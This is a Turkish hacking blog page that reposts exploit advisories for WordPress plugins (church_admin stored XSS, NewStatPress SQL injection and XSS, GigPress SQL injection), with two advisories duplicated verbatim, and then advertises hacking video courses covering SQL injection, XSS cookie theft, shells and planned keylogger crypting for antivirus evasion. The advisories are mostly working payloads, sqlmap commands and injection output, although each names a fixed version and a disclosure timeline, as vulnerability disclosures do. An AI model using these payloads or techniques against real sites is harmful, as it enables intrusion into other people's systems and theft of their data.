KAPTANWHİTEHAT HOŞ GELDİNİZ! !
Blogumuza Hoş Geldiniz Keyifli Zaman Geçirmek Dileğiyle. http://kaptanwhitehat.blogspot.com.tr/.
KAPTANWHİTEHAT Fame Store ile sende fame ol!!
KAPTANWHİTEHAT Hack Fame Store ile bir çok sosyal paylaşım sitesinde fame olabilirsin! www.KAPTANWHİTEHAT.blogspot.com.tr.
KAPTANWHİTEHAT hackerlar'dan korunma yolları!
Bi hacker saldırısına korunma yollarını blogdaki konuları takip ederek öğrenebilirsiniz. www.KAPTANWHİTEHAT.blogspot.com.tr.
KAPTANWHİTEHAT programcı olmak istermisiniz
Programlama kategorisini takip ederek programcı olabilirsiniz. www.KAPTANWHİTEHAT.blogspot.com.tr.
En Güncel Paylaşımlar KAPTANWHİTEHAT'da !
En güncel Hack Paylaşımlar blog sayfamızdan ulaşabilir araştırabilirisiniz. www.KAPTANWHİTEHAT.blogspot.com.tr.
26 Mayıs 2015 Salı
Sosyal Dork
Wordpress church_admin Stored XSS
# Exploit Title: Wordpress church_admin Stored XSS
# Date: 21-04-2015
# Exploit Author: woodspeed
# Vendor Homepage: https://wordpress.org/plugins/church-admin/
# Version: 0.800
# OSVDB ID : http://www.osvdb.org/show/osvdb/121304
# WPVULNDB ID : https://wpvulndb.com/vulnerabilities/7999
# Category: webapps
1. Description
On the registration form the address field is not validated before returning it to the user.
Visiting the Directory page, will show the confirm window.
2. Proof of Concept
POST /wordpress/index.php/2015/05/21/church_admin-registration-form/
save=yes&church_admin_register=9d18cf0420&_wp_http_referer=%2Fwordpress%2Findex.php%2F2015%2F05%2F21%2Fchurch_admin-registration-form%2F&first_name%5B%5D=test&prefix%5B%5D=&last_name%5B%5D=test&mobile%5B%5D=%2B3670&people_type_id%5B%5D=1&email%5B%5D=test%40test.test&sex1=male&phone=%2B3670&address=%3Cscript%3Econfirm%28%29%3C%2Fscript%3E&lat=51.50351129583287&lng=-0.148193359375&recaptcha_challenge_field=03AHJ_VuvBRBO1Vts65lchUe_H_c1AuISniJ4rFDcaPyecjg-HypsHSZSfTkCyZMUC6PjVQAkkuFDfpnsKn28LU8wIMxb9nF5g7XnIYLt0qGzhXcgX4LSX5ul7tPX3RSdussMajZ-_N1YQnOMJZj8b5e5LJgK68Gjf8aaILIyxKud2OF2bmzoZKa56gt1jBbzXBEGASVMMFJ59uB9FsoJIzVRyMJmaXbbrgM01jnSseeg-thefo83fUZS9uuqrBQgqAZGYMmTWdgZ4xvrzXUdv5Zc76ktq-LWKPA&recaptcha_response_field=134
GET /wordpress/index.php/2015/05/21/church_admin-directory/
<header class="entry-header">
<h1 class="entry-title">church_admin directory</h1> </header><!-- .entry-header -->
<div class="entry-content">
<p><a href="http://localhost/wordpress/?download=addresslist&addresslist=d759d84e16&member_type_id=1,2">PDF version</a></p><form name="ca_search" action="" method="POST">
<p><label style="width:75px;float:left;">Search</label><input name="ca_search" type="text"/><input type="submit" value="Go"/><input type="hidden" name="ca_search_nonce" value="99de1bedec"/></p></form><div class="tablenav"><div class="tablenav-pages"><div class="pagination"></div>
</div></div>
<div class="church_admin_address" itemscope itemtype="http://schema.org/Person">
<div class="church_admin_name_address" >
<p><span itemprop="name"><strong>test test</strong></span></p>
<p><span itemprop="address" itemscope itemtype="http://schema.org/PostalAddress"><script>confirm()</script></span></p></div><!--church_admin_name_address-->
<div class="church_admin_phone_email">
<p> <a class="email" href="tel:+3670">+3670</a><br/>
<a class="email" href="tel:+3670"><span itemprop="telephone">+3670</span></a><br/>
<a class="email" itemprop="email" href="mailto:test@test.test">test@test.test</a><br/>
</p>
</div><!--church_admin_phone_email-->
3. Solution
Fixed in version 0.810.
Multiple vulnerabilities in WordPress plugin "NewStatPress"
# Title: Multiple vulnerabilities in WordPress plugin "NewStatPress"
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/newstatpress/
# Active installs: 20,000+
# Vulnerable version: 0.9.8
# Fixed version: 0.9.9
# CVE: CVE-2015-4062, CVE-2015-4063
Vulnerabilities (2)
=====================
(1) Authenticated SQLi [CWE-89] (CVE-2015-4062)
-----------------------------------------------
* CODE:
includes/nsp_search.php:94
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
if(($_GET["what$i"] != '') && ($_GET["where$i"] != '')) {
$where.=" AND ".$_GET["where$i"]." LIKE '%".$_GET["what$i"]."%'";
}
}
+++++++++++++++++++++++++++++++++++++++++
* POC:
http://[domain]/wp-admin/admin.php?where1=agent[SQLi]&limitquery=1&searchsubmit=Buscar&page=nsp_search
SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?where1=agent&limitquery=1&searchsubmit=Buscar&page=nsp_search" -p where1
[............]
GET parameter 'where1' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 89 HTTP(s) requests:
---
Parameter: where1 (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: where1=agent AND (SELECT * FROM (SELECT(SLEEP(5)))Guji)&limitquery=1&searchsubmit=Buscar&page=nsp_search
---
[12:25:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0.12
+++++++++++++++++++++++++++++++++++++++++
(2) Authenticated XSS [CWE-79] (CVE-2015-4063)
----------------------------------------------
includes/nsp_search.php:128
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
if($_GET["where$i"] != '') { print "<th scope='col'>".ucfirst($_GET["where$i"])."</th>"; }
}
+++++++++++++++++++++++++++++++++++++++++
* POC:
http://[domain]/wp-admin/admin.php?where1=<script>alert(String.fromCharCode(88,+83,+83))</script>&searchsubmit=Buscar&page=nsp_search
Timeline
==========
2015-05-09: Discovered vulnerability.
2015-05-19: Vendor notification.
2015-05-19: Vendor response.
2015-05-20: Vendor fix.
2015-05-25: Public disclosure.
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/newstatpress/
# Active installs: 20,000+
# Vulnerable version: 0.9.8
# Fixed version: 0.9.9
# CVE: CVE-2015-4062, CVE-2015-4063
Vulnerabilities (2)
=====================
(1) Authenticated SQLi [CWE-89] (CVE-2015-4062)
-----------------------------------------------
* CODE:
includes/nsp_search.php:94
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
if(($_GET["what$i"] != '') && ($_GET["where$i"] != '')) {
$where.=" AND ".$_GET["where$i"]." LIKE '%".$_GET["what$i"]."%'";
}
}
+++++++++++++++++++++++++++++++++++++++++
* POC:
http://[domain]/wp-admin/admin.php?where1=agent[SQLi]&limitquery=1&searchsubmit=Buscar&page=nsp_search
SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?where1=agent&limitquery=1&searchsubmit=Buscar&page=nsp_search" -p where1
[............]
GET parameter 'where1' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 89 HTTP(s) requests:
---
Parameter: where1 (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: where1=agent AND (SELECT * FROM (SELECT(SLEEP(5)))Guji)&limitquery=1&searchsubmit=Buscar&page=nsp_search
---
[12:25:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0.12
+++++++++++++++++++++++++++++++++++++++++
(2) Authenticated XSS [CWE-79] (CVE-2015-4063)
----------------------------------------------
includes/nsp_search.php:128
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
if($_GET["where$i"] != '') { print "<th scope='col'>".ucfirst($_GET["where$i"])."</th>"; }
}
+++++++++++++++++++++++++++++++++++++++++
* POC:
http://[domain]/wp-admin/admin.php?where1=<script>alert(String.fromCharCode(88,+83,+83))</script>&searchsubmit=Buscar&page=nsp_search
Timeline
==========
2015-05-09: Discovered vulnerability.
2015-05-19: Vendor notification.
2015-05-19: Vendor response.
2015-05-20: Vendor fix.
2015-05-25: Public disclosure.
SQLi vulnerabilities in WordPress plugin "GigPress"
# Title: SQLi vulnerabilities in WordPress plugin "GigPress"
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/gigpress/
# Active installs: 20,000+
# Vulnerable version: 2.3.8
# Fixed version: 2.3.9
# CVE: CVE-2015-4066
Vulnerabilities (2)
=====================
(1) Authenticated SQLi [CWE-89]
-------------------------------
* CODE:
admin/handlers.php:87
+++++++++++++++++++++++++++++++++++++++++
$show['show_tour_id'] = $_POST['show_tour_id'];
+++++++++++++++++++++++++++++++++++++++++
admin/handlers.php:94
+++++++++++++++++++++++++++++++++++++++++
$artist = $wpdb->get_var("SELECT artist_name FROM " . GIGPRESS_ARTISTS . " WHERE artist_id = " . $show['show_artist_id'] . "");
+++++++++++++++++++++++++++++++++++++++++
* POC:
http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php
POST DATA:
_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1[SQLi]&show_venue_id=1&show_related=new
SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php" --data="_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1&show_related=new" -p show_artist_id --dbms mysql
[............]
POST parameter 'show_artist_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 72 HTTP(s) requests:
---
Parameter: show_artist_id (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1 AND (SELECT 9266 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(9266=9266,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&show_venue_id=1&show_related=new
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))BiUm)&show_venue_id=1&show_related=new
---
[12:21:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0
+++++++++++++++++++++++++++++++++++++++++
(2) Authenticated SQLi [CWE-89]
-------------------------------
* CODE:
admin/handlers.php:71
+++++++++++++++++++++++++++++++++++++++++
$show['show_venue_id'] = $_POST['show_venue_id'];
+++++++++++++++++++++++++++++++++++++++++
admin/handlers.php:95
+++++++++++++++++++++++++++++++++++++++++
$venue = $wpdb->get_results("SELECT venue_name, venue_city FROM " . GIGPRESS_VENUES . " WHERE venue_id = " . $show['show_venue_id'] . "", ARRAY_A);
+++++++++++++++++++++++++++++++++++++++++
* POC:
http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php
POST DATA:
_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1[SQLi]&show_related=new
SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php" --data="_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1&show_related=new" -p show_venue_id --dbms mysql
[............]
POST parameter 'show_venue_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 72 HTTP(s) requests:
---
Parameter: show_venue_id (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1 AND (SELECT 6543 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(6543=6543,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&show_related=new
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))OzkE)&show_related=new
---
[12:23:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0
+++++++++++++++++++++++++++++++++++++++++
Timeline
========
2015-05-09: Discovered vulnerability.
2015-05-20: Vendor notification.
2015-05-20: Vendor response and fix.
2015-05-25: Public disclosure.
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/gigpress/
# Active installs: 20,000+
# Vulnerable version: 2.3.8
# Fixed version: 2.3.9
# CVE: CVE-2015-4066
Vulnerabilities (2)
=====================
(1) Authenticated SQLi [CWE-89]
-------------------------------
* CODE:
admin/handlers.php:87
+++++++++++++++++++++++++++++++++++++++++
$show['show_tour_id'] = $_POST['show_tour_id'];
+++++++++++++++++++++++++++++++++++++++++
admin/handlers.php:94
+++++++++++++++++++++++++++++++++++++++++
$artist = $wpdb->get_var("SELECT artist_name FROM " . GIGPRESS_ARTISTS . " WHERE artist_id = " . $show['show_artist_id'] . "");
+++++++++++++++++++++++++++++++++++++++++
* POC:
http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php
POST DATA:
_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1[SQLi]&show_venue_id=1&show_related=new
SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php" --data="_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1&show_related=new" -p show_artist_id --dbms mysql
[............]
POST parameter 'show_artist_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 72 HTTP(s) requests:
---
Parameter: show_artist_id (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1 AND (SELECT 9266 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(9266=9266,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&show_venue_id=1&show_related=new
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))BiUm)&show_venue_id=1&show_related=new
---
[12:21:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0
+++++++++++++++++++++++++++++++++++++++++
(2) Authenticated SQLi [CWE-89]
-------------------------------
* CODE:
admin/handlers.php:71
+++++++++++++++++++++++++++++++++++++++++
$show['show_venue_id'] = $_POST['show_venue_id'];
+++++++++++++++++++++++++++++++++++++++++
admin/handlers.php:95
+++++++++++++++++++++++++++++++++++++++++
$venue = $wpdb->get_results("SELECT venue_name, venue_city FROM " . GIGPRESS_VENUES . " WHERE venue_id = " . $show['show_venue_id'] . "", ARRAY_A);
+++++++++++++++++++++++++++++++++++++++++
* POC:
http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php
POST DATA:
_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1[SQLi]&show_related=new
SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php" --data="_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1&show_related=new" -p show_venue_id --dbms mysql
[............]
POST parameter 'show_venue_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 72 HTTP(s) requests:
---
Parameter: show_venue_id (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1 AND (SELECT 6543 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(6543=6543,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&show_related=new
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))OzkE)&show_related=new
---
[12:23:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0
+++++++++++++++++++++++++++++++++++++++++
Timeline
========
2015-05-09: Discovered vulnerability.
2015-05-20: Vendor notification.
2015-05-20: Vendor response and fix.
2015-05-25: Public disclosure.
25 Mayıs 2015 Pazartesi
Hacking Security Egitim Seti 1 - Bug Res.
Selamun Aleyküm abilerim & kardeşlerim sizlere kendimce uğraş verdiğim Hacking&Security Eğitim Setimin 1.Partını Sunuyorum. Bu set Yeni başlayan ve hackten birazda olsun anlayayım diyen arkadaşlarımız için Eğitim amaçlı hazırlanmıştır. Hacking & Security nin Temel Adımlarından ve Konularından Oluşuyor.
Videolar tamamen özgün anlatımımdan oluşuyor. Ezbere uygulama yerine tamamen mantığa dayalı gösterimle anlatmaya çalıştım. Video da kullanılan dökümanlarla verdim. Örneğin Mysql de Char fonksiyonu kullandım Char converter ın basit bir dönüştürücüsünü verdim.
Xss anlatımında kullandığım ve kullanmadığım kodları verdim. Yani sizlerinde uygulamaları yapabilmeniz için gerekli her şey mevcuttur.
Umarım beğenilir ve faydalanılır.
Konudaki beğenilerinizi ve eleştirilerinizi +/ - olarak belirtirseniz daha yararlı olacaktır.
Konu hakkında yorumlarınızı da belirtirseniz 2. ve 3.Eğitim Setimiz açısından daha yararlı olacaktır. Sonuna Kadar Misyon Dahilinde Kullanılması Dileklerimle (F) Ramazan Hediyemdir
İçindekiler ;
----------SQL INJECTION-----------
SQL İnjection / Toplam 7 Video
- Login By Pass
- Access İnj
- Mysql İnj
- Mssql İnj
- Blindsql İnj
----------RFI & LFI------------------
RFI-LFI / Toplam 3 Video
- Rfi – Lfi Yöntemleri
------------XSS & COOKIE ATTACK------
XSS – Cookie Attack / Toplam 3 Video
- Her Yönüyle XSS
- Cookie Handling
----------- XSRF & CSRF --------------
Xsrf – Csrf / Toplam 1 Video
- Xsrf – Csrf
--------------- SHEL -------------------------
- Shell Tanımı ve Shell Konusuna Giriş
~~~~~~~~Toplam 14 Video~~~~~~~~
Download [ -- 19,4 MB --] : BURADAN İNDİRİNİZ
ALternatif Link 1= http://rapidshare.com/files/306041977/F0RTYS3V3N_Hacking_Security_Egitim_Seti__1_.rar
ALternatif Link 2= http://www.zshare.net/download/68419841aefccea7/
2. ve 3. Setlerimizi Elimden Geldiğince Erken Bitirmeye Çalışacağım.
Reel İşlerimden Fırsat Buldukça Tamamlayacağım İnş.
F0RTYS3V3N Hacking&Security Egitim Seti -2- de Planlanan Konular ;
Orta Dereceli Kişiler İçin Hazırlanacaktır.
Tümüyle Shell Çeşitleri ve Kullanımı
Linux & Windows Server Rooting
Linux & Windows Server By Pass
Dns Zone Transfer
Dns Cache Poising
SQL ile RFI Açığı Oluşturma
Metasploit & Reverse Shell
ClickJacking
Planlanan 3.Eğitim Setimiz ise Keylogger Cryptolama,FUD ve UD yöntemlerine yönelik olacaktır. Bunun yanında WebHacking Konuları duruma göre belirlenecektir. Ayrıca Buffer Over Flow Elimden Geldiğince Anlatacağım.
Penetrasyon Eğitimleri 4 |
Selamun Aleyküm;
Sahn-ı Seman tim bünyesinde olarak eğitimlere devam ediyorum. ISSAF tarafından geliştirilen metodolojiyi temel alınmıştır.. Videolar Pentest aşamasında kullanılan muhtemel araçları işimize yarıcak şekilde kullanmayı gösterdim yani araçların tanıtımı değildir ne işe yaradıkları ve nasıl kullanılacağını anlattım. Devamı gelecektir, faydalı olması dileğiyle..
Not: Diğer araçların devam videoları gelecektir.
1 Uniscan | Zayıflık Tarama(3)
onaylanana kadar buradan izleyebilirsiniz.
2 WPscan | Zayıflık Tarama(3)
onaylanana kadar buradan izleyebilirsiniz.
3 w3af Uniscan | Zayıflık Tarama(3)
onaylanana kadar buradan izleyebilirsiniz.
4 Vega | Zayıflık Tarama(3)
onaylanana kadar buradan izleyebilirsiniz.
Sahn-ı Seman tim bünyesinde olarak eğitimlere devam ediyorum. ISSAF tarafından geliştirilen metodolojiyi temel alınmıştır.. Videolar Pentest aşamasında kullanılan muhtemel araçları işimize yarıcak şekilde kullanmayı gösterdim yani araçların tanıtımı değildir ne işe yaradıkları ve nasıl kullanılacağını anlattım. Devamı gelecektir, faydalı olması dileğiyle..
Not: Diğer araçların devam videoları gelecektir.
1 Uniscan | Zayıflık Tarama(3)
onaylanana kadar buradan izleyebilirsiniz.
2 WPscan | Zayıflık Tarama(3)
onaylanana kadar buradan izleyebilirsiniz.
3 w3af Uniscan | Zayıflık Tarama(3)
onaylanana kadar buradan izleyebilirsiniz.
4 Vega | Zayıflık Tarama(3)
onaylanana kadar buradan izleyebilirsiniz.
Penetrasyon Eğitimleri 3 |
Selamun aleyküm,
Sahn-ı Seman tim adına sesli Pentest videoların serisine devam sonuna kadar gidicez :) ISSAF tarafından geliştirilen metodolojiyi temel alınmıştır.. Videolar Pentest aşamasında kullanılan muhtemel araçları işimize yarıcak şekilde kullanmayı gösterdim yani araçların tanıtımı değildir ne işe yaradıkları ve nasıl kullanılacağını anlattım. Devamı gelecektir, faydalı olması dileğiyle..
1 Traceroute ve Tcptraceroure Kullanımı | Ağ Haritalama(2)
İçerik: TraceRoute ve TcpTraceRoute ile hedef sisteme giden yolun haritasının çıkartılması.
onaylanana kadar buradan izleyebilirsiniz.
2 Nslookup ve Nmap Kullanımı | Ağ Haritalama(2)
İçerik: Nslookup ile hedefin NS bilgisi alma. Nslookup ve Nmap ile hedefin dns versiyon keşfi.
onaylanana kadar buradan izleyebilirsiniz.
3 Nmap ile Aktif Sistem Belirleme | Ağ Haritalama(2)
İçerik: Nmap aracı ile aktif sistem belirleme, sunucu ve istemci keşfetme.
onaylanana kadar buradan izleyebilirsiniz.
4 Nmap ile Aktif Port Servis Version Belirleme | Ağ Haritalama(2)
İçerik: Nmap aracı ile hedefin açık portları, servisleri ve versionlarını belirleme.
onaylanana kadar buradan izleyebilirsiniz.
5 Nmap ile İşletim Sistemi Keşfi | Ağ Haritalama(2)
İçerik: Nmap aracı ile hedefin işletim sistemini belirleme.
onaylanana kadar buradan izleyebilirsiniz.
6 Nmap NSE WAF Tespiti ve Bypass | Ağ Haritalama(2)
İçerik: Nmap Script Engine kullanarak WAF tespiti ve firewall bypass.
onaylanana kadar buradan izleyebilirsiniz.
